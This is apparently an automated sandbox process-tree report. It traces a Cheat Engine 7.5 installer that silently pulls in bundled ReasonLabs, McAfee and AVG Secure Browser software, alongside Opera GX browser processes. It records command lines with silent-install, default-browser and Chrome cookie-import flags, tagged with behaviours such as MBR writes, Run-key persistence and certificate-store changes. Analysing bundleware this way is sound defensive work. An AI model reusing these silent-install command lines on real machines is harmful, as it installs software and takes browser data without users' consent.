C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --start-stack-profiler --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=245 --field-trial-handle=9400,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8140 /prefetch:12⤵PID:4956
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=246 --field-trial-handle=6652,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3364 /prefetch:12⤵PID:4516
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=247 --field-trial-handle=9828,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3012 /prefetch:12⤵PID:8108
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=248 --field-trial-handle=6464,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=10088 /prefetch:12⤵PID:8172
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=renderer --user-agent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 OPR/109.0.0.0 (Edition std-2)" --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=249 --field-trial-handle=10564,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=3120 /prefetch:12⤵PID:3248
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10044,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=5300 /prefetch:82⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:812
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=10696,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8780 /prefetch:82⤵PID:6728
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3164,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=520 /prefetch:82⤵PID:6612
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=9924,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8116 /prefetch:82⤵PID:4192
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=3296,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=7824 /prefetch:82⤵PID:164
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=8056,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=8532 /prefetch:82⤵PID:5988
-
-
C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe"C:\Users\Admin\AppData\Local\Programs\Opera GX\opera.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --enable-quic --no-appcompat-clear --with-feature:cashback-assistant=on --with-feature:gx-widgets-mission=on --with-feature:address-bar-dropdown-autocompleted-domains=off --with-feature:address-bar-dropdown-unfiltered-full=off --with-feature:amazon-new-ids=on --with-feature:cashback-assistant=on --with-feature:continue-on-booking=on --with-feature:continue-on-shopping-via-amp=off --with-feature:continue-shopping=on --with-feature:continue-shopping-2=on --with-feature:continue-shopping-5=on --with-feature:continue-shopping-structured-partners=on --with-feature:feature-remote-disable-updates-testing-flag=off --with-feature:feature-remote-updates-testing-flag=on --with-feature:game-servers=off --with-feature:gx-post-mortem=on --with-feature:gx-reactinator=on --with-feature:gx-spotlight=on --with-feature:gx-video-to-phone=on --with-feature:logitech-led-support=on --with-feature:lucid-mode-hide-text=on --with-feature:panic-button=on --with-feature:password-generator=off --with-feature:play-again=on --with-feature:run-at-startup-default=on --with-feature:sd-suggestions-external=on --with-feature:session-restore-attribution=on --with-feature:side-profiles=on --with-feature:sitecheck-age=on --with-feature:tiktok-panel=on --with-feature:ui-compositor-multithreaded=on --with-feature:installer-experiment-test=off --with-feature:installer-bypass-launcher=off --ab_tests=GXCTest25-test:DNA-99214_GXCTest25,DNA-112027-gx-mission-widget-on:DNA-112027 --field-trial-handle=5300,i,1380631115879678608,14005847233204371976,262144 --variations-seed-version --mojo-platform-channel-handle=9424 /prefetch:82⤵PID:3340
-
-
C:\Program Files\scoped_dir5888_484163526\CheatEngine75.exe"C:\Program Files\scoped_dir5888_484163526\CheatEngine75.exe"2⤵PID:7680
-
C:\Users\Admin\AppData\Local\Temp\is-6767S.tmp\CheatEngine75.tmp"C:\Users\Admin\AppData\Local\Temp\is-6767S.tmp\CheatEngine75.tmp" /SL5="$F030C,29019897,780800,C:\Program Files\scoped_dir5888_484163526\CheatEngine75.exe"3⤵
- Checks for any installed AV software in registry
- Checks processor information in registry
PID:5956 -
C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod0.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod0.exe" -ip:"dui=ae202211-6e17-4cac-b8d2-d431e54ee209&dit=20240522195755&is_silent=true&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&b=&se=true" -vp:"dui=ae202211-6e17-4cac-b8d2-d431e54ee209&dit=20240522195755&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100&oip=26&ptl=7&dta=true" -dp:"dui=ae202211-6e17-4cac-b8d2-d431e54ee209&dit=20240522195755&oc=ZB_RAV_Cross_Tri_NCB&p=cdc2&a=100" -i -v -d -se=true4⤵PID:7940
-
C:\Users\Admin\AppData\Local\Temp\n5wjshui.exe"C:\Users\Admin\AppData\Local\Temp\n5wjshui.exe" /silent5⤵PID:5264
-
C:\Users\Admin\AppData\Local\Temp\nsb659F.tmp\RAVEndPointProtection-installer.exe"C:\Users\Admin\AppData\Local\Temp\nsb659F.tmp\RAVEndPointProtection-installer.exe" "C:\Users\Admin\AppData\Local\Temp\n5wjshui.exe" /silent6⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
PID:5376 -
C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe"C:\Program Files\ReasonLabs\Common\rsSyncSvc.exe" -i -bn:ReasonLabs -pn:EPP -lpn:rav_antivirus -url:https://update.reasonsecurity.com/v2/live -dt:107⤵PID:6304
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngine.inf7⤵
- Adds Run key to start application
PID:10588 -
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r8⤵
- Checks processor information in registry
PID:6844 -
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o9⤵PID:10624
-
-
-
-
C:\Windows\system32\wevtutil.exe"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\x64\rsKernelEngineEvents.xml7⤵PID:10788
-
-
C:\Windows\SYSTEM32\fltmc.exe"fltmc.exe" load rsKernelEngine7⤵
- Suspicious behavior: LoadsDriver
PID:392
-
-
C:\Windows\system32\wevtutil.exe"C:\Windows\system32\wevtutil.exe" im C:\Program Files\ReasonLabs\EPP\elam\evntdrv.xml7⤵PID:10776
-
-
C:\Program Files\ReasonLabs\EPP\rsWSC.exe"C:\Program Files\ReasonLabs\EPP\rsWSC.exe" -i -i7⤵PID:10832
-
-
C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe"C:\Program Files\ReasonLabs\EPP\rsClientSvc.exe" -i -i7⤵PID:11252
-
-
C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe"C:\Program Files\ReasonLabs\EPP\rsEngineSvc.exe" -i -i7⤵
- Modifies system certificate store
PID:8752
-
-
C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe"C:\Program Files\ReasonLabs\EDR\rsEDRSvc.exe" -i -i7⤵PID:9836
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\325ntlt2.exe"C:\Users\Admin\AppData\Local\Temp\325ntlt2.exe" /silent5⤵PID:3212
-
C:\Users\Admin\AppData\Local\Temp\nsw71A0.tmp\RAVVPN-installer.exe"C:\Users\Admin\AppData\Local\Temp\nsw71A0.tmp\RAVVPN-installer.exe" "C:\Users\Admin\AppData\Local\Temp\325ntlt2.exe" /silent6⤵
- Drops file in Program Files directory
PID:7332 -
C:\Program Files\ReasonLabs\VPN\rsVPNClientSvc.exe"C:\Program Files\ReasonLabs\VPN\rsVPNClientSvc.exe" -i -i7⤵PID:8960
-
-
C:\Program Files\ReasonLabs\VPN\rsVPNSvc.exe"C:\Program Files\ReasonLabs\VPN\rsVPNSvc.exe" -i -i7⤵PID:10516
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2yafrxp2.exe"C:\Users\Admin\AppData\Local\Temp\2yafrxp2.exe" /silent5⤵PID:4516
-
C:\Users\Admin\AppData\Local\Temp\nsb97B.tmp\SaferWeb-installer.exe"C:\Users\Admin\AppData\Local\Temp\nsb97B.tmp\SaferWeb-installer.exe" "C:\Users\Admin\AppData\Local\Temp\2yafrxp2.exe" /silent6⤵
- Drops file in Drivers directory
- Drops file in Program Files directory
PID:7536 -
\??\c:\windows\system32\rundll32.exe"c:\windows\system32\rundll32.exe" setupapi.dll,InstallHinfSection DefaultInstall 128 C:\Program Files\ReasonLabs\DNS\rsDwf.inf7⤵
- Adds Run key to start application
PID:11716 -
C:\Windows\system32\runonce.exe"C:\Windows\system32\runonce.exe" -r8⤵
- Checks processor information in registry
PID:11744 -
C:\Windows\System32\grpconv.exe"C:\Windows\System32\grpconv.exe" -o9⤵PID:11784
-
-
-
-
C:\Program Files\ReasonLabs\DNS\rsDNSClientSvc.exe"C:\Program Files\ReasonLabs\DNS\rsDNSClientSvc.exe" -i -i7⤵PID:11884
-
-
C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe"C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe" -i -service install7⤵PID:12092
-
-
C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe"C:\Program Files\ReasonLabs\DNS\rsDNSResolver.exe" -service install7⤵PID:12188
-
-
C:\Program Files\ReasonLabs\DNS\rsDNSSvc.exe"C:\Program Files\ReasonLabs\DNS\rsDNSSvc.exe" -i -i7⤵PID:7388
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod1_extract\saBSI.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod1_extract\saBSI.exe" /affid 91082 PaidDistribution=true CountryCode=GB4⤵
- Modifies system certificate store
PID:3852 -
C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod1_extract\installer.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod1_extract\\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade5⤵
- Drops file in Program Files directory
PID:8184 -
C:\Program Files\McAfee\Temp1962996300\installer.exe"C:\Program Files\McAfee\Temp1962996300\installer.exe" /setOem:Affid=91082 /s /thirdparty /upgrade6⤵PID:4960
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod2_extract\avg_secure_browser_setup.exe"C:\Users\Admin\AppData\Local\Temp\is-AS3K2.tmp\prod2_extract\avg_secure_browser_setup.exe" /s /run_source=avg_ads_is_control /is_pixel_psh=BjYV6dEE0o4yL6BTPrEMYifzFda7GSwH9g99LBh7HYKZ1obqxzEPEBhW6YxJanxKniGwNj2PWZCnzHX /make-default4⤵
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Writes to the Master Boot Record (MBR)
- Checks SCSI registry key(s)
PID:4652 -
C:\Users\Admin\AppData\Local\Temp\nsb6689.tmp\AVGBrowserUpdateSetup.exeAVGBrowserUpdateSetup.exe /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9230&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome"5⤵
- Drops file in Program Files directory
PID:5336 -
C:\Program Files (x86)\GUM701C.tmp\AVGBrowserUpdate.exe"C:\Program Files (x86)\GUM701C.tmp\AVGBrowserUpdate.exe" /silent /install "bundlename=AVG Secure Browser&appguid={48F69C39-1356-4A7B-A899-70E3539D4982}&appname=AVG Secure Browser&needsadmin=true&lang=en-US&brand=9230&installargs=--no-create-user-shortcuts --make-chrome-default --force-default-win10 --auto-import-data%3Dchrome --import-cookies --auto-launch-chrome"6⤵
- Sets file execution options in registry
- Writes to the Master Boot Record (MBR)
- Modifies Internet Explorer settings
- Modifies registry class
PID:7428 -
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regsvc7⤵
- Modifies registry class
PID:8108
-
-
C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe"C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe" /regserver7⤵
- Modifies registry class
PID:6280 -
C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"C:\Program Files (x86)\AVG\Browser\Update\1.8.1693.6\AVGBrowserUpdateComRegisterShell64.exe"8⤵
- Registers COM server for autorun
- Modifies registry class
PID:4596
-
-
